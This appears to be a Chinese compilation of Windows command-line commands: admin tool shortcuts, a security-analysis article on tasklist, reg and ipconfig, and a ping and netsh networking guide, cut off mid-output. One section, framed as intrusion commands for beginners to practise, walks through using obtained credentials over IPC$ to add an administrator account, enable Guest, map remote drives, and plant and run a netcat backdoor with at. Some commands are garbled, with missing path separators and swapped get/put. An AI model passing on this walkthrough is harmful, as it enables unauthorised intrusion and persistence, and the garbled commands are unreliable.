系统管理员CMD命令集.docx

1、系统管理员CMD命令集系统管理员CMD 命令集 gpedit.msc-组策略 sndrec32-录音机 Nslookup-IP地址侦测器 explorer-打开资源管理器 logoff-注销命令 tsshutdn-60秒倒计时关机命令 lusrmgr.msc-本机用户和组 services.msc-本地服务设置 oobe/msoobe /a-检查XP是否激活 notepad-打开记事本 cleanmgr-垃圾整理 net start messenger-开始信使服务 compmgmt.msc-计算机管理 net stop messenger-停止信使服务 conf-启动netmeeting d

2、vdplay-DVD播放器 charmap-启动字符映射表 diskmgmt.msc-磁盘管理实用程序 calc-启动计算器 dfrg.msc-磁盘碎片整理程序 chkdsk.exe-Chkdsk磁盘检查 devmgmt.msc- 设备管理器 regsvr32 /u *.dll-停止dll文件运行 drwtsn32- 系统医生 rononce -p -15秒关机 dxdiag-检查DirectX信息 regedt32-注册表编辑器 Msconfig.exe-系统配置实用程序 rsop.msc-组策略结果集 mem.exe-显示内存使用情况 regedit.exe-注册表 winchat-XP自

3、带局域网聊天 progman-程序管理器 winmsd-系统信息 perfmon.msc-计算机性能监测程序 winver-检查Windows版本 sfc /scannow-扫描错误并复原 taskmgr-任务管理器（2000xp2003）netstat -an 查看当前服务器连接 netstat -n netstat -s netstat -a菜鸟必练入侵命令 1：NET只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1net use 127.0.0.1ipc$ “123456 /user:”hbx”

4、退出的命令是net use 127.0.0.1ipc$ /delte下面的操作你必须登陆后才可以用.登陆的方法就在上面.-下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用户.我们加一个heibai的用户密码为lovechinanet user heibai lovechina /add只要显示命令成功，那么我们可以把他加入Administrator组了.net localgroup Administrators heibai /add-这里是讲映射对方的C盘，当然其他盘也可以，只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.net use z:127.0.0.1c$-net

5、start telnet这样可以打开对方的TELNET服务.-这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。net user guest /active:yes-这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！net user guest lovechinanet命令果然强大啊！2:at一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？那么需要用AT命令，这里假设你已经登陆了那个服务器。你首先要得到对方的时间，net time 1

6、27.0.0.1将会返回一个时间，这里假设时间为12:1，现在需要新建一个作业，其ID=1at 127.0.0.1 12:3 nc.exe这里假设了一个木马，名为NC.EXE，这个东西要在对方服务器上.这里介绍一下NC，NC是NETCAT的简称，为了方便输入，一般会被改名.它是一个TELNET服务，端口为99.等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.3:telnet这个命令非常实用，它可以与远方做连接，不过正常下需要密码、用户，不过你给对方种了木马，直接连到这个木马打开的端口.telnet 127.0.0.1 99这样就可以连到对方的99端口.那你就可以在对方运行命令

7、了，这个也就是肉鸡.4:FTP它可以将你的东西传到对方机子上，你可以去申请个支持FTP上传的空间，国内多的是，如果真的找不到，我给个www.51.NET，不错的.当我们申请完后，它会给用户名，密码，以及FTP服务器.在上传前需要登陆先，这里我们假设FTP服务器是www.51.NET，用户名是HUCJS，密码是654321ftp 他会要求输入用户，成功后会要求输入密码.下面先说上传，假设你需上传的文件是INDEX.HTM，它位于C:下，传到对方D:get c:index.htm d:假设你要把对方C盘下的INDEX.HTM，下到你的机子的D盘下put c:index.htm d:5:copy下面

8、我说说怎样把本地的文件复制到对方硬盘上去，需要建立好IPC$连接才有效。这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下copy index.htm 127.0.0.1c$index.htm-如果你要复制到D盘下把C改为D，就行了！copy index.htm 127.0.0.1d$index.htm-如果你要把他复制到WINNT目录里就要把输入copy index.htm 127.0.0.1admin$index.htmadmin$是winnt-要把对方的文件复制过来，顺便告诉大家NT的备份的数据库Windows内部命令 Windows系统中最有用的命令行工具：包括W

9、MIC、net、openfiles、netstat和查找命令。我将集中阐述五个比较有用的命令，并分析安全专家如何使用这些命令来帮助他们更好地工作，从而完整地列出十大命令。与使用tasklist的程序相结合当没有其它选择，只运行tasklist命令时，它会显示一列所有正在运行的程序，显示这些程序的名称、PID码和其它统计信息。要获得更多的tasklist信息，可以考虑这样运行该命令：C: tasklist /svc这个命令可以使tasklist显示每个进程中是哪个服务正在运行。许多Windows用户并不理解服务与进程之间的关系，Windows系统中的每个服务必须在某个程序中运行，并且一些程序内部

10、有多个服务。因此，程序与服务之间的关系是一对多的关系，tasklist命令可以揭示这一点。Tasklist命令的另一种有用形式是：C: tasklist /m“m”代表“模块(modules)”，或者代表tasklist指代DLL和代码库的方式，代码库是程序在运行过程中按照主机的命令而加载的。当用这种方法调用命令时，tasklist可以显示当前加载到所有运行程序中的每一个DLL。这就为用户在特定的时间内提供了大量的信息，这些信息是关于其计算机上正在发生的情况。虽然非常麻烦，Google搜索特定的程序和DLL，可能会带回反病毒厂商站点中的恶意软件描述，有了特定样本，就可以洞察到攻击者的动机。高级

11、注册表分析的reg命令Reg命令可以使用户与其机器的注册表在命令行进行交互。没有采用麻烦的regedit GUI来操纵注册表，安全专家可以简单地弹出打开一个Windows命令界面，并运行reg命令，进而读取或更新注册表。然而，reg命令不允许注册表的交互式浏览；用户需要知道他们想要查看或改变的注册表索引的完整路径。但是，一旦知道了路径，reg命令是一种进行更改的简单方式。如果要查看特定注册表索引的设置，使用reg命令的“查询”选项，具体如下所示：C: reg query hklmsoftwaremicrosoftwindowscurrentversionrun这个索引控制Windows上不同的

12、自动启动程序，当计算机启动以及随后用户登录到系统时，这些程序开始运行。许多恶意软件样本可以改变这个索引，来确保当系统重新启动时，恶意软件也开始运行。将单个索引或者整个注册表输出到一个文件，用于分析或者将其安装在一个隔离的系统中，reg命令支持“reg输出”功能。除了读取和输出注册表设置以外，reg命令也可以进行更新。“reg add”命令将更新现有索引值，或者在不存在索引的情况下，创建一个索引。“reg import”命令可以导入多个注册表索引。使用ipconfig进行DNS分析大多数真正的Windows用户都熟悉ipconfig命令，它非常有用，可以显示Windows中的网络设置。但是，ip

13、config有一个非常有用的功能，Ipconfig命令可以显示本地Windows机器中的DNS缓冲器，如下所示：C: ipconfig /displaydns该命令的输出可以显示各种缓冲域名、其相关的IP地址以及DNS记录的停留时间（以秒计）。如果用户重复运行这个命令，他们可以看到停留时间在减少，直到记录终止并且被放弃，或者得到更新。在研究快速通量僵尸网络时，查看DNS缓冲器和停留时间（TTL）值是非常重要的，可以利用带有小部分TTL的DNS记录，来迫使连续更新，并使研究者宁不清楚黑客主要的后端服务器的地址。无可否认，ipconfig并不拥有诸如本文中提到的其它命令（比如tasklist和re

14、g）那么多的功能。但是，这条命令的一个用处就非常有用。利用FOR /L循环重复运行有时，管理员或者安全专家想要重复运行一条命令，可能在5秒的间隔内寻找其输出的变化。要实现这一目的，他们可以采用Windows 系统的FOR循环。Windows支持五种不同的FOR循环，它们可以遍历文件整数、文件名、目录名称、文件内容和字符串。这里的重点是这些循环的最简化，尤其是FOR /L，由于它可以用来使命令连续运行，进而实现无数次遍历。FOR /L循环的语法是：C: for /L %var in (start,step,stop) do commandvar是我们的迭代变量，一个英文字母将会在循环中的每一步显

15、示不同的迭代值。然后，用户指定变量的初始值，在循环中的每一步中，数值会增加，并且其最大值会终止循环。也应当指定循环中每一步运行的命令。具体说来，需要考虑下面的几点： C: for /L %i in (1,1,10) do echo %i这个循环会使用%i作为一个变量，初始值为1。循环中的每一次迭代，%i会增加1，直至升到10。然后，在循环中，用户可以使用echo命令，简单地在屏幕上打印出迭代变量的值。告诉系统不要打印出命令本身，这使得输出稍微漂亮一些。用户仅仅告诉系统从1计数到10。现在，我们来看看如何使用这条命令来实现tasklist命令的连续运行：C: for /L %i in (1,0,

16、2) do tasklist输入这条命令，就意味着用户告诉计算机为变量赋值为1 ，启动循环，计数为0 ，自始至终升到2。这就会无限计数，直到用户单击CTRL-C来终止它。用户可以在每次迭代中简单地运行tasklist命令。要在迭代之间延迟几秒，只需要添加“& ping -n 6 127.0.0.1 nul”，在循环的每次迭代中简单地多次ping本地主机（127.0.0.1）。如下所示：C: for /L %i in (1,0,2) do tasklist & ping -n 6 127.0.0.1 nul由于Windows命令行没有内置的睡眠功能，来等待某个特定的延迟，用户可以使用ping，进

17、而产生一个延迟。上面的命令可以ping本地主机地址六次（-n 6），引入一个五秒的延迟（第一次ping立即发生，紧接着是每秒一次ping，持续五秒）。我们正将ping烦人的输出转储为nul，并使之消失。结果是一个命令可以让tasklist每五秒运行一次，这个技术可以用于重复运行本文中提到的每条命令，用户可以更仔细地检查输出。更复杂的语法甚至可以解析命令的输出，允许产生专门制作的脚本，进而用于详细的系统分析，但是这种语法超出了每月技巧的讨论范围。通过命令行启动管理GUI虽然Windows命令行有许多功能强大的工具，但是，不论你相信与否，有时候，GUI工具可以比命令行做的更好。然而，Microso

18、ft已经在其GUI的某些地址中埋藏了不同的控件，记忆这些模糊的地址是一项令人混乱的任务。幸运的是，用户不必挖掘GUI来寻找他们想要的东西；相反，他们可以依赖命令行快捷方式。比如，不用在开始菜单中寻找并运行本地用户管理GUI，用户可以采用就近的命令提示和类型：C: lusrmgr.msc大量的其它GUI控件都可以采用这种方法从命令行中启动，这样就可以节省大量的时间。下面是我钟爱的一些控件：Secpol.msc：这是本地安全策略的管理者，用于在机器上配置大量的安全设置。Services.msc：这条命令可以启动服务的控制面板GUI。Control：这个命令可以调出工具的整个控制面板设置。Taskm

19、gr.exe：该命令用于启动任务管理器。Explorer.exe：运行这条命令，可以采用便捷的方式调用Windows file explorer。Eventvwr.ms：该命令可以运行此命令运行Windows事件查看器（Windows Event Viewer），有助于日志分析。这些Windows命令行工具可以帮助管理员和安全专家更有力的掌控其Windows机器，当受到攻击时，可以更安全地进行配置，更详尽地进行分析。常见网络命令的使用1、 IPCONFIGipconfig 实用程序和它的等价图形用户界面windows 95/98 中的winipcfg 可用于显示当前的tcp/ip配置的设置值。

20、这些信息一般用来检验人工配置的tcp/ip设置是否正确。但是，如果你的计算机和所在的局域网使用了动态主机配置协议（dynamic hostconfiguration protocol，dhcpwindows nt 下的一种把较少的ip 地址分配给较多主机使用的协议，类似于拨号上网的动态ip分配），这个程序所显示的信息也许更加实用。这时，ipconfig可以让你了解你的计算机是否成功的租用到一个ip地址，如果租用到则可以了解它目前分配到的是什么地址。了解计算机当前的ip地址、子网掩码和缺省网关实际上是进行测试和故障分析的必要项目。最常用的选项：ipconfig当使用ipconfig时不带任何参数

21、选项，那么它为每个已经配置了的接口显示ip地址、子网掩码和缺省网关值。ipconfig /all当使用all 选项时，ipconfig能为dns 和wins 服务器显示它已配置且所要使用的附加信息（如ip地址等），并且显示内置于本地网卡中的物理地址（mac）。如果ip地址是从dhcp服务器租用的，ipconfig将显示dhcp服务器的ip地址和租用地址预计失效的日期（有关dhcp服务器的相关内容请详见其他有关nt服务器的书籍或询问你的网管）。如运行IPCONFIG.EXE则运行结果如下:Windows IP ConfigurationEthernet adapter 本地连接:Connecti

22、on-specific DNS Suffix . :IP Address. . . . . . . . . . . . : 168.168.120.66Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 168.168.120.2502、 PING命令ping 是个使用频率极高的实用程序，用于确定本地主机是否能与另一台主机交换（发送与接收）数据报。根据返回的信息，你就可以推断tcp/ip参数是否设置得正确以及运行是否正常。需要注意的是：成功地与另一台主机进行一次或两次数据报交换

23、并不表示tcp/ip配置就是正确的，你必须执行大量的本地主机与远程主机的数据报交换，才能确信tcp/ip的正确性。简单的说，ping就是一个测试程序，如果ping运行正确，你大体上就可以排除网络访问层、网卡、modem的输入输出线路、电缆和路由器等存在的故障，从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送，ping 也被某些别有用心的人作为ddos（拒绝服务攻击）的工具，前段时间yahoo就是被黑客利用数百台可以高速接入互联网的电脑连续发送大量ping 数据报而瘫痪的。按照缺省设置，windows上运行的ping命令发送4个icmp（网间控制报文协议）回送请求，每个3

24、2字节数据，如果一切正常，你应能得到4个回送应答。ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络连接速度比较快。ping还能显示ttl（time to live存在时间）值，你可以通过ttl值推算一下数据包已经通过了多少个路由器：源地点ttl起始值（就是比返回ttl略大的一个2的乘方数）-返回时ttl值。例如，返回ttl值为119，那么可以推算数据报离开源地址的ttl起始值为128，而源地点到目标地点要通过9个路由器网段（128-119）；如果返回ttl值为246，ttl起始值就是256，源地点到目标地点要通过9个路由器

25、网段。通过ping检测网络故障的典型次序。正常情况下，当你使用ping命令来查找问题所在或检验网络运行情况时，你需要使用许多ping命令，如果所有都运行正确，你就可以相信基本的连通性和配置参数没有问题；如果某些ping命令出现运行故障，它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障：ping 127.0.0.1这个ping命令被送到本地计算机的ip软件，该命令永不退出该计算机。如果没有做到这一点，就表示tcp/ip的安装或运行存在某些最基本的问题。ping 本机ip这个命令被送到你计算机所配置的ip 地址，你的计算机始终都应该对该ping命令作出应答，如果没有，则表

26、示本地配置或安装存在问题。出现此问题时，局域网用户请断开网络电缆，然后重新发送该命令。如果网线断开后本命令正确，则表示另一台计算机可能配置了相同的ip地址。ping 局域网内其他ip这个命令应该离开你的计算机，经过网卡及网络电缆到达其他计算机，再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码（进行子网分割时，将ip地址的网络部分与主机部分分开的代码）不正确或网卡配置错误或电缆系统有问题。ping 网关ip这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够作出应答。ping 远程ip如果收到4 个应答，表示成功的使用了缺省网关。对于拨号上

27、网用户则表示能够成功的访问internet（但不排除isp的dns会有问题）。ping localhostlocalhost是个作系统的网络保留名，它是127.0.0.1的别名，每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内，则表示主机文件（/windows/host）中存在问题。ping 服务器如果这里出现故障，则表示dns服务器的ip地址配置不正确或dns服务器有故障（对于拨号上网用户，某些isp 已经不需要设置dns 服务器了）。顺便说一句：你也可以利用该命令实现域名对ip地址的转换功能。如果上面所列出的所有ping命令都能正常运行，那么你对你的计算机进行本地和远程通信的

28、功能基本上就可以放心了。但是，这些命令的成功并不表示你所有的网络配置都没有问题，例如，某些子网掩码错误就可能无法用这些方法检测到。下面出示ping命令及其输出的例子：C:WINIdoWSping 198.87.118.1Pinging 198.98.118.1 whit 32 bytes of data：Reply from 198.98.118.1：bytes=32 time=224ms TTL=14Reply from 198.98.118.1：bytes=32 time=213ms TTl=14Reply from 198.98.118.1：bytes=32 time=213ms TTl

29、=14Reply from 198.98.118.1：bytes=32 time=213ms TTl=14除了帮助判断伺时一台主机不能达到和测试路由器及其他主机的连接外，ping还可测试路由问题。当使用一台主机时，如果用ping获取它的IP地址，但Ping未能到达该主机时，那么该主机可能没有列在DNS服务器或是本地的Hosts文件中，或是指定的是一个无效的DNS服务器或该DNS服务器是不可到达的。这时可以通过向Hosts文件中输入远程主机的名字和IP地址(正在ping的那台主机)来缓解这个问题。在开始用ping工具进行远程主机连接或路由问题解决之前，应该首先用ping测试计算机来验证它的网络接

30、口正在正确工作。要测试自己的机器，可使用下面命令的任意一个(用你的计算机的实际1P地址代替yourIPaddress)：ping locatlhostping 127.0.0.1ping yourIPqaddress如何查找MAC地址1、在Windows 9x/2000/XP下单击“开始/程序”，找到“MS-DOS方式”或“命令提示符”。2、在命令提示符下输入：“Ipconfig/all”，回车后出现如附图所示的对话框，其中的“Physical Address”即是所查的MAC 地址。网管人员必备常用命令 如果你玩过路由器的话，就知道路由器里面那些很好玩的命令缩写。 例如，sh int 的意思是 show interface。现在 Windows 也有了类似界面的工具，叫做 netsh。我们在 Windows 的 cmd shell 下，输入 netsh就出来：netsh 提示符，输入 int ip 就显示：interface ip然后输入 dump ，我们就可以看到当前系统的网络配置：# -# Interface IP Configurati